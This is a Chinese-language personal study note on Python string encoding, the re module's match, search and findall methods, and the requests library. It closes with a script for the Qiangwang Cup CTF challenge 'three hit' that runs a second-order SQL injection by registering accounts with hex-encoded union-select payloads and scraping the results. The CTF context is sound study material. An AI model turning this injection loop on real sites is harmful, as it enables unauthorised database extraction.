python requests使用笔记

Python中的字符编码问题

字符串前加u，表示对字符串进行unicode编码，中文必须表明编码，否则一旦编码转换就会出现乱码。

字符串前加r，表示字符串里所有字符都是普通字符，不进行转义，常用于正则表达式，对应着re模块。

字符串前加b，表示该字符串以字节形式表示。

ord()接收一个字符作为参数，返回对应的ASCII或unicode数值，chr()接收一个范围在range（256）内的（就是0～255）的整数作参数，返回一个对应的ASCII字符。

把UTF-8编码表示的字符串’xxx’转换为Unicode字符串u'xxx'用decode('utf-8')方法：

>>> 'abc'.decode('utf-8')
u'abc'
>>> '\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
u'\u4e2d\u6587'
>>> print '\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8')
中文

decode的作用是将其他编码的字符串转换成unicode编码，如str1.decode('gb2312')，表示将gb2312编码的字符串str1转换成unicode编码。
encode的作用是将unicode编码转换成其他编码的字符串，如str2.encode('gb2312')，表示将unicode编码的字符串str2转换成gb2312编码。

正则表达式re模块的用法

compile方法

1
2
3

import re
# 将正则表达式编译成 Pattern 对象 
pattern = re.compile(r'\d+')

match方法

1	match(string,pos,end)

match方法用于查找字符串头部，string是待匹配字符串，pos和end分别指定字符串的起始和终点位置，例子：

>>> import re
>>> pattern = re.compile(r'\d+')                    # 用于匹配至少一个数字
>>> m = pattern.match('one12twothree34four')        # 查找头部，没有匹配
>>> print m
None
>>> m = pattern.match('one12twothree34four', 2, 10) # 从'e'的位置开始匹配，没有匹配
>>> print m
None
>>> m = pattern.match('one12twothree34four', 3, 10) # 从'1'的位置开始匹配，正好匹配
>>> print m                                         # 返回一个 Match 对象
<_sre.SRE_Match object at 0x10a42aac0>
>>> m.group(0)   # 可省略 0
'12'
>>> m.start(0)   # 可省略 0
3
>>> m.end(0)     # 可省略 0
5
>>> m.span(0)    # 可省略 0
(3, 5)

search方法

1	search(string,pos,end)

search方法用于查找字符串的任何位置（与match区别）

>>> import re
>>> pattern = re.compile('\d+')
>>> m = pattern.search('one12twothree34four')  # 这里如果使用 match 方法则不匹配
>>> m
<_sre.SRE_Match object at 0x10cc03ac0>
>>> m.group()
'12'
>>> m = pattern.search('one12twothree34four', 10, 30)  # 指定字符串区间
>>> m
<_sre.SRE_Match object at 0x10cc03b28>
>>> m.group()
'34'
>>> m.span()
(13, 15)

findall
findall方法非常重要，可以搜索整个字符串，获得所有匹配的结果。

1	findall(string,pos,end)//同样的，pos，end指定字符串的起始和终点位置

例子：

import re
 
pattern = re.compile(r'\d+')   # 查找数字
result1 = pattern.findall('hello 123456 789')
result2 = pattern.findall('one1two2three3four4', 0, 10)
 
print result1
print result2

结果：

1 2	['123456', '789'] ['1', '2']

findall()的更多用法：https://www.cnblogs.com/xieshengsen/p/6727064.html

requests模块

GET请求

1 2	payload = {'key1': 'value1', 'key2': 'value2', 'key3': None} r = requests.get('http://httpbin.org/get', params=payload)

r.url是:http://httpbin.org/get?key1=value1&key2=value2&key2=value3

r.text返回headers中的编码解析的结果，可以通过r.encoding = 'gbk'来变更解码方式

r.content返回二进制结果

r.json()返回JSON格式，可能抛出异常

r.status_code返回响应状态码

POST请求

url = 'https://api.github.com/some/endpoint' payload = {"some": "data"}
r = requests.post(url, data=payload)
//强网杯three hit代码
import requests
import string
import re
import time
import uuid
import binascii

reg_url = "http://39.107.32.29:10000/index.php?func=register"
log_url = "http://39.107.32.29:10000/index.php?func=login"
pro_url = "http://39.107.32.29:10000/profile.php"
cookies = {"PHPSESSID":"lsosjp3spgek89gd4t5ibrc9j3"}
proxies = {"http":"http://127.0.0.1:8080"}

if __name__ == "__main__":
	prefex = str(uuid.uuid1())[0:5]
	n = 1
	while True:
		query = raw_input("> ")
		#query = "1 and 1=2 union select 1,(%s),3,4-- data"%query
		query = str(binascii.hexlify(query))
		user = "%s%d"%(prefex, n)
		requests.post(url = reg_url,cookies=cookies,data ={"username":user,"age":"0x%s"%query,"password":"hello"},proxies=proxies)
		requests.post(url = log_url, cookies=cookies,data ={"username":user,"password":"hello"},proxies=proxies)
		r = requests.get(url = pro_url,cookies=cookies,proxies=proxies)
		m = re.findall(r'whose name is <a>(.*)</a> isalso',r.content)
		for result in m:
			print result
		n += 1

THE END

reference

http://funhacks.net/2016/12/27/regular_expression/

https://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000/001431664106267f12e9bef7ee14cf6a8776a479bdec9b9000

http://docs.python-requests.org/zh_CN/latest/user/quickstart.html